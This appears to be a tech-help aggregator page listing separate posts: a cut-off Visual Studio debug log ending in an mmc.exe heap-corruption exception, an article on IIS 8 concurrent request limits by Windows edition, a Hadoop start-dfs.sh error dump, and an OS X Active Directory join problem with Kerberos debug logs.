'mmc.exe': Loaded 'C:\Windows\System32\uxtheme.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\duser.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\imm32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\msctf.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\odbcint.dll', Binary was not built with debug information. 'mmc.exe': Loaded 'C:\Windows\System32\dui70.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd\comctl32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\shell32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\cryptbase.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\urlmon.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\wininet.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\iertutil.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\crypt32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\msasn1.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\clbcatq.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\mmcndmgr.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\dwmapi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\oleacc.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\cryptsp.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\rsaenh.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\RpcRtRemote.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\mlang.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\xmllite.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\version.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\apphelp.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\msi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Program Files\Microsoft Visual Studio 8\SDK\v2.0\Bin\mscormmc.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\mscoree.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4927_none_d08a205e442db5b5\msvcr80.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\azroleui.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\atl.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\secur32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\netutils.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\dsrole.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\logoncli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\dsuiext.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\ntdsapi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\ws2_32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\nsi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\activeds.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\adsldpc.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\Wldap32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\mpr.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\netapi32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\srvcli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\wkscli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\certmgr.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\certcli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\CertEnroll.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\cryptui.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\ncrypt.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\bcrypt.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\wintrust.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\imagehlp.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\sspicli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\aclui.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\IPHLPAPI.DLL', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\winnsi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\slc.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\comsnap.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\mfc42.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\mycomput.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\devmgr.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\setupapi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\cfgmgr32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\devobj.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\devrtl.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\newdev.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\dmdskmgr.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\dmutil.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\dmdskres.dll', Binary was not built with debug information. 'mmc.exe': Loaded 'C:\Windows\System32\dmdskres2.dll', Binary was not built with debug information. 'mmc.exe': Loaded 'C:\Windows\System32\gpedit.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\dssec.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\authz.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\dfscli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\samcli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\gpapi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\framedynos.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\wtsapi32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\ipsmsnap.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\winipsec.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\userenv.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\profapi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\ipsecsnp.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\polstore.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\localsec.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\wdc.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\pdh.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\pdhui.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\comdlg32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\credui.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\wevtapi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\pla.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\tdh.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\winsta.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\utildll.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\browcli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\vdmdbg.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\pmcsnap.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\winspool.drv', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\puiapi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\wsecedit.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\scecli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\filemgmt.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Program Files\Microsoft SQL Server\100\Tools\Binn\SqlManager.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\winsxs\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_cbf21254470d8752\mfc80u.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4927_none_d08a205e442db5b5\msvcp80.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\winsxs\x86_microsoft.vc80.atl_1fc8b3b9a1e18e3b_8.0.50727.4053_none_d1c738ec43578ea1\ATL80.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7600.16661_none_ebfb56996c72aefc\comctl32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\winsxs\x86_microsoft.vc80.mfcloc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_03ca5532205cb096\mfc80ENU.dll', Binary was not built with debug information. 'mmc.exe': Loaded 'C:\Program Files\Microsoft SQL Server\100\Tools\Binn\Resources\1033\SqlManager.rll', Binary was not built with debug information. 'mmc.exe': Loaded 'C:\Windows\System32\msxml6.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Program Files\Microsoft SQL Server\90\Tools\Binn\SqlManager.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\wbem\wbemcntl.dll', Cannot find or open the PDB file The thread 'Win32 Thread' (0xf74) has exited with code 0 (0x0). Unhandled exception at 0x774d35e3 in mmc.exe: 0xC0000374: A heap has been corrupted.

    Read the article

  • Windows 8 / IIS 8 Concurrent Requests Limit

    - by OWScott
    IIS 8 on Windows Server 2012 doesn’t have any fixed concurrent request limit, apart from whatever limit would be reached when resources are maxed. However, the client version of IIS 8, which is on Windows 8, does have a concurrent connection request limitation to limit high traffic production uses on a client edition of Windows. Starting with IIS 7 (Windows Vista), the behavior changed from previous versions.  In previous client versions of IIS, excess requests would throw a 403.9 error message (Access Forbidden: Too many users are connected.).  Instead, Windows Vista, 7 and 8 queue excessive requests so that they will be handled gracefully, although there is a maximum number of requests that will be processed simultaneously. Thomas Deml provided a concurrent request chart for Windows Vista many years ago, but I have been unable to find an equivalent chart for Windows 8 so I asked Wade Hilmo from the IIS team what the limits are.  Since this is controlled not by the IIS team itself but rather from the Windows licensing team, he asked around and found the authoritative answer, which I’ll provide below. Windows 8 – IIS 8 Concurrent Requests Limit Windows 8 3 Windows 8 Professional 10 Windows RT N/A since IIS does not run on Windows RT Windows 7 – IIS 7.5 Concurrent Requests Limit Windows 7 Home Starter 1 Windows 7 Basic 1 Windows 7 Premium 3 Windows 7 Ultimate, Professional, Enterprise 10 Windows Vista – IIS 7 Concurrent Requests Limit Windows Vista Home Basic (IIS process activation and HTTP processing only) 3 Windows Vista Home Premium 3 Windows Vista Ultimate, Professional 10 Windows Server 2003, Windows Server 2008, Windows Server 2008 R2 and Windows Server 2012 allow an unlimited amount of simultaneously requests.

    Read the article

  • Problem with hadoop start-dfs.sh

    - by user288501
    I installed and configured hadoop on my Ubuntu 14.04 server, virtualized inside of hyper-v, however I am getting an issue when i run start-dfs.sh root@sUbuntu01:/var/log# start-dfs.sh 14/06/04 15:27:08 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable Starting namenodes on [OpenJDK 64-Bit Server VM warning: You have loaded library /usr/local/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard. The VM will try to fix the stack guard now. It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'. localhost] sed: -e expression #1, char 6: unknown option to `s' -c: Unknown cipher type 'cd' localhost: Ubuntu 14.04 LTS localhost: starting namenode, logging to /usr/local/hadoop/logs/hadoop-root-namenode-sUbuntu01.out noexecstack'.: ssh: Could not resolve hostname noexecstack'.: Name or service not known '-z: ssh: Could not resolve hostname '-z: Name or service not known 'execstack: ssh: Could not resolve hostname 'execstack: Name or service not known disabled: ssh: Could not resolve hostname disabled: Name or service not known with: ssh: Could not resolve hostname with: Name or service not known have: ssh: Could not resolve hostname have: Name or service not known VM: ssh: Could not resolve hostname vm: Name or service not known stack: ssh: Could not resolve hostname stack: Name or service not known guard: ssh: Could not resolve hostname guard: Name or service not known fix: ssh: Could not resolve hostname fix: Name or service not known VM: ssh: Could not resolve hostname vm: Name or service not known the: ssh: Could not resolve hostname the: Name or service not known to: ssh: Could not resolve hostname to: Name or service not known warning:: ssh: Could not resolve hostname warning:: Name or service not known it: ssh: Could not resolve hostname it: Name or service not known now.: ssh: Could not resolve hostname now.: Name or service not known library: ssh: Could not resolve hostname library: Name or service not known will: ssh: Could not resolve hostname will: Name or service not known link: ssh: Could not resolve hostname link: Name or service not known or: ssh: Could not resolve hostname or: Name or service not known It's: ssh: Could not resolve hostname it's: Name or service not known <libfile>',: ssh: Could not resolve hostname <libfile>',: Name or service not known which: ssh: connect to host which port 22: Connection timed out have: ssh: connect to host have port 22: Connection timed out you: ssh: connect to host you port 22: Connection timed out try: ssh: connect to host try port 22: Connection timed out the: ssh: connect to host the port 22: Connection timed out highly: ssh: connect to host highly port 22: Connection timed out might: ssh: connect to host might port 22: Connection timed out loaded: ssh: connect to host loaded port 22: Connection timed out You: ssh: connect to host you port 22: Connection timed out guard.: ssh: connect to host guard. port 22: Connection timed out library: ssh: connect to host library port 22: Connection timed out Server: ssh: connect to host server port 22: Connection timed out fix: ssh: connect to host fix port 22: Connection timed out The: ssh: connect to host the port 22: Connection timed out recommended: ssh: connect to host recommended port 22: Connection timed out that: ssh: connect to host that port 22: Connection timed out stack: ssh: connect to host stack port 22: Connection timed out OpenJDK: ssh: connect to host openjdk port 22: Connection timed out 64-Bit: ssh: connect to host 64-bit port 22: Connection timed out with: ssh: connect to host with port 22: Connection timed out localhost: Ubuntu 14.04 LTS localhost: starting datanode, logging to /usr/local/hadoop/logs/hadoop-root-datanode-sUbuntu01.out localhost: OpenJDK 64-Bit Server VM warning: You have loaded library /usr/local/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard. The VM will try to fix the stack guard now. localhost: It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'. Starting secondary namenodes [OpenJDK 64-Bit Server VM warning: You have loaded library /usr/local/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard. The VM will try to fix the stack guard now. It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'. 0.0.0.0] sed: -e expression #1, char 6: unknown option to `s' warning:: ssh: Could not resolve hostname warning:: Name or service not known -c: Unknown cipher type 'cd' It's: ssh: Could not resolve hostname it's: Name or service not known 'execstack: ssh: Could not resolve hostname 'execstack: Name or service not known '-z: ssh: Could not resolve hostname '-z: Name or service not known 0.0.0.0: Ubuntu 14.04 LTS 0.0.0.0: starting secondarynamenode, logging to /usr/local/hadoop/logs/hadoop-root-secondarynamenode-sUbuntu01.out 0.0.0.0: OpenJDK 64-Bit Server VM warning: You have loaded library /usr/local/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard. The VM will try to fix the stack guard now. 0.0.0.0: It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'. noexecstack'.: ssh: Could not resolve hostname noexecstack'.: Name or service not known <libfile>',: ssh: Could not resolve hostname <libfile>',: Name or service not known link: ssh: Could not resolve hostname link: No address associated with hostname it: ssh: Could not resolve hostname it: No address associated with hostname to: ssh: connect to host to port 22: Connection timed out or: ssh: connect to host or port 22: Connection timed out you: ssh: connect to host you port 22: Connection timed out guard.: ssh: connect to host guard. port 22: Connection timed out VM: ssh: connect to host vm port 22: Connection timed out stack: ssh: connect to host stack port 22: Connection timed out library: ssh: connect to host library port 22: Connection timed out Server: ssh: connect to host server port 22: Connection timed out might: ssh: connect to host might port 22: Connection timed out stack: ssh: connect to host stack port 22: Connection timed out You: ssh: connect to host you port 22: Connection timed out now.: ssh: connect to host now. port 22: Connection timed out disabled: ssh: connect to host disabled port 22: Connection timed out have: ssh: connect to host have port 22: Connection timed out will: ssh: connect to host will port 22: Connection timed out The: ssh: connect to host the port 22: Connection timed out have: ssh: connect to host have port 22: Connection timed out try: ssh: connect to host try port 22: Connection timed out the: ssh: connect to host the port 22: Connection timed out guard: ssh: connect to host guard port 22: Connection timed out the: ssh: connect to host the port 22: Connection timed out recommended: ssh: connect to host recommended port 22: Connection timed out with: ssh: connect to host with port 22: Connection timed out library: ssh: connect to host library port 22: Connection timed out 64-Bit: ssh: connect to host 64-bit port 22: Connection timed out fix: ssh: connect to host fix port 22: Connection timed out which: ssh: connect to host which port 22: Connection timed out VM: ssh: connect to host vm port 22: Connection timed out OpenJDK: ssh: connect to host openjdk port 22: Connection timed out fix: ssh: connect to host fix port 22: Connection timed out highly: ssh: connect to host highly port 22: Connection timed out that: ssh: connect to host that port 22: Connection timed out with: ssh: connect to host with port 22: Connection timed out loaded: ssh: connect to host loaded port 22: Connection timed out 14/06/04 15:36:02 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable Any advice?

    Read the article

  • Can't join OS X Mavericks to AD Domain

    - by watkipet
    I'm attempting to join an OS X Mavericks (10.9) client to a Windows Server 2008 Active Directory domain, however the bind fails with this error in the OS X client's system.log: Oct 24 15:03:15 host.domain.com com.apple.preferences.users.remoteservice[5547]: -[ODCAddServerSheetController handleOtherActionError: gotError: Error Domain=com.apple.OpenDirectory Code=5202 "Authentication server encountered an error while attempting the requested operation." UserInfo=0x7f9e6cb3e180 {NSLocalizedDescription=Authentication server encountered an error while attempting the requested operation., NSLocalizedFailureReason=Authentication server encountered an error while attempting the requested operation.}, Authentication server encountered an error while attempting the requested operation. I've joined (bound) Ubuntu Linux clients to the same domain with net ads join in the past with no problems (using the same administrative user). I don't have access to any server logs. Here's the GUI error (from Directory Utility) on the OS X client: Here's the GUI error (from User's and Groups) in System Preferences on the OS X client: Update After some Wiresharking I've got some more info: OS X Client - KDC (over UDP): AS_REQ (no padata) OS X Client <- KDC (over UDP): KRB5KDC_ERR_PREAUTH_REQUIRED OS X Client - KDC (over UDP): AS_REQ (this time with PA-ENC-TIMESTAMP in padata) OS X Client <- KDC (over UDP): KRB5KDC_ERR_RESPONSE_TOO_BIG OS X Client - KDC (over TCP): AS_REQ (also with PA-ENC-TIMESTAMP in padata) OS X Client <- KDC (over TCP): KDC_ERR_ETYPE_NOSUPP ...and that's it. This is what I think is going on: The OS X client sends a kerberos request. The KDC says, "You need to pre-authenticate. Try again" The OS X client tries to pre-authenticate (all this so far is over UDP) Something gets lost on our network and the KDC says, "Oops something went wrong" The OS X client switches to TCP and tries again. Over TCP, the KDC says, "You're using an encryption type I don't support" Note that in its padata records, the OS X client is always using "aes256-cts-hmac-sha1-96" as its encryption type. However, in its KDC_REQ_BODY record it lists the aes256-cts-hmac-sha1-96, aes128-cts-hmac-sha1-96, des3-cbc-sha1, and rc4-hmac encryption types. When the KDC comes back with KDC_ERR_ETYPE_NOSUPP, it uses rc4-hmac as its encryption type in its padata record. I know next to nothing about Kerberos, but it seems to me that the OS X client should go ahead and try the rc4-hmac encryption type. However, it does nothing after this. Update 2 Here's the debug log from Directory Services on the OS X client. Sorry--it's long. 2013-10-25 14:19:13.219128 PDT - 10544.20463 - ODNodeCustomCall request, NodeID: 52A65FAE-4B24-455D-86EC-2199A780D234, Code: 80 2013-10-25 14:19:13.220409 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - client requested OU - 'CN=Computers,DC=domain,DC=com' 2013-10-25 14:19:13.220427 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - Binding using '[email protected]' for kerberos ID 2013-10-25 14:19:13.220571 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - new kerberos credential cache 'MEMORY:0x7fa713635470' for '[email protected]' 2013-10-25 14:19:13.220623 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: loop 1 2013-10-25 14:19:13.220639 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - KDC send 0 patypes 2013-10-25 14:19:13.220653 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - fast disabled, not doing any fast wrapping 2013-10-25 14:19:13.220699 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - Trying to find service kdc for realm DOMAIN.COM flags 0 2013-10-25 14:19:13.221275 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - submissing new requests to new host 2013-10-25 14:19:13.221326 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - connecting to host: udp 192.168.0.1:kerberos (192.168.0.1) tid: 00000001 2013-10-25 14:19:13.221373 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - writing packet: udp 192.168.0.1:kerberos (192.168.0.1) tid: 00000001 2013-10-25 14:19:13.222588 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - reading packet: udp 192.168.0.1:kerberos (192.168.0.1) tid: 00000001 2013-10-25 14:19:13.222617 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - host completed: udp 192.168.0.1:kerberos (192.168.0.1) tid: 00000001 2013-10-25 14:19:13.222665 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_sendto_context DOMAIN.COM done: 0 hosts 1 packets 1 wc: 0.001960 nr: 0.000000 kh: 0.000560 tid: 00000001 2013-10-25 14:19:13.222705 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: loop 2 2013-10-25 14:19:13.222737 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: processing input 2013-10-25 14:19:13.222752 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: got an KRB-ERROR from KDC 2013-10-25 14:19:13.222775 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: KRB-ERROR -1765328359/Additional pre-authentication required 2013-10-25 14:19:13.222791 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - KDC send 4 patypes 2013-10-25 14:19:13.222800 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - KDC send PA-DATA type: 19 2013-10-25 14:19:13.222808 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - KDC send PA-DATA type: 2 2013-10-25 14:19:13.222816 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - KDC send PA-DATA type: 16 2013-10-25 14:19:13.222825 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - KDC send PA-DATA type: 15 2013-10-25 14:19:13.222840 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: using ENC-TS with enctype 18 2013-10-25 14:19:13.222850 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: using default_s2k_func 2013-10-25 14:19:13.227443 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - fast disabled, not doing any fast wrapping 2013-10-25 14:19:13.227502 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - Trying to find service kdc for realm DOMAIN.COM flags 0 2013-10-25 14:19:13.228233 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - submissing new requests to new host 2013-10-25 14:19:13.228320 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - connecting to host: udp 192.168.0.1:kerberos (192.168.0.1) tid: 00010001 2013-10-25 14:19:13.228374 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - writing packet: udp 192.168.0.1:kerberos (192.168.0.1) tid: 00010001 2013-10-25 14:19:13.229930 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - reading packet: udp 192.168.0.1:kerberos (192.168.0.1) tid: 00010001 2013-10-25 14:19:13.229957 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - host completed: udp 192.168.0.1:kerberos (192.168.0.1) tid: 00010001 2013-10-25 14:19:13.229975 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_sendto trying over again (reset): 0 2013-10-25 14:19:13.230023 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - Trying to find service kdc for realm DOMAIN.COM flags 2 2013-10-25 14:19:13.230664 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - submissing new requests to new host 2013-10-25 14:19:13.230726 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - connecting to host: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00010002 2013-10-25 14:19:13.230818 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - connecting to 11: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00010002 2013-10-25 14:19:13.231101 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - writing packet: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00010002 2013-10-25 14:19:13.232743 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - reading packet: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00010002 2013-10-25 14:19:13.232777 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - host completed: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00010002 2013-10-25 14:19:13.232798 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_sendto_context DOMAIN.COM done: 0 hosts 2 packets 2 wc: 0.005316 nr: 0.000000 kh: 0.001339 tid: 00010002 2013-10-25 14:19:13.232856 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: loop 3 2013-10-25 14:19:13.232868 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: processing input 2013-10-25 14:19:13.232900 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: using keyproc 2013-10-25 14:19:13.232910 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: using default_s2k_func 2013-10-25 14:19:13.236487 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: extracting ticket 2013-10-25 14:19:13.236557 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: wc: 0.015944 2013-10-25 14:19:13.237022 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - Trying to find service kdc for realm DOMAIN.COM flags 2 2013-10-25 14:19:13.237444 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - submissing new requests to new host 2013-10-25 14:19:13.237482 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - connecting to host: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00020001 2013-10-25 14:19:13.237551 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - connecting to 11: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00020001 2013-10-25 14:19:13.237900 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - writing packet: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00020001 2013-10-25 14:19:13.238616 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - reading packet: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00020001 2013-10-25 